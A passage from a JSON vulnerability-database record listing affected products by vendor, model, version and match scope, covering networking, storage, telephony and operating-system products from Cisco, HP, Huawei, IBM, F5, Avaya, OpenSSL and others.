0.3, "vendor": "cisco", "version": "80500" }, { "model": "big-ip edge clients for android", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.0.0" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "s7700\u0026s9700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s2600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl 1.0.1h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.10" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.2354" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "ftp server", "scope": "ne", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.3" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "security information and event management ga", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.4.0" }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-1" }, { "model": "usg9500 v300r001c20sph102", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge clients for android", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0.4" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "asa cx context-aware security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "unified im and presence services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "security network intrusion prevention system gv200", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "elog v100r003c01spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.6" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "s5900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s6900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "fusionsphere v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tsm v100r002c07spc219", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "espace iad v300r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server sp1 p28", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "security network intrusion prevention system gx7412-10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s2750\u0026s5700\u0026s6700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hyperdp v200r001c09spc501", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "project metasploit framework", "scope": "ne", "trust": 0.3, "vendor": "metasploit", "version": "4.9.3" }, { "model": "usg2000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "project metasploit framework", "scope": "eq", "trust": 0.3, "vendor": "metasploit", "version": "4.9.2" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip gtm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "svn5500 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "8.4-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "agent desktop for cisco unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s5500t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace iad v300r001c07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "dsr-1000 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "documentum content server sp2 p16", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip pem", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "ip video phone e20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.2.6" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate products", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.9" }, { "model": "srg1200\u00262200\u00263200 v100r002c02hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "56000" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77009.7" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s2750\u0026s5700\u0026s6700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "espace u19** v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.1" }, { "model": "uma v200r001c00spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s6800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge clients for linux", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7101" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace usm v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "nexus switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "31640" }, { "model": "fusionsphere v100r003c10spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.0" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "smc2.0 v100r002c01b025sp07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "espace cc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "isoc v200r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "esight-ewl v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "icewall sso dfw certd", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip gtm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber im for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "small cell factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0" }, { "model": "spa525 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "advanced settings utility", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "espace u2980 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "s12700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "oceanstor s2200t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0" }, { "model": "s2900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v39.7" }, { "model": "open source security information management", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.10" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "usg5000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.9" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.1" }, { "model": "stunnel", "scope": "eq", "trust": 0.3, "vendor": "stunnel", "version": "5.00" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.4" }, { "model": "s5900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight v2r3c10spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip afm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "s3900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyoffice emm", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2.6.0601.0090" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.12" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": null, "trust": 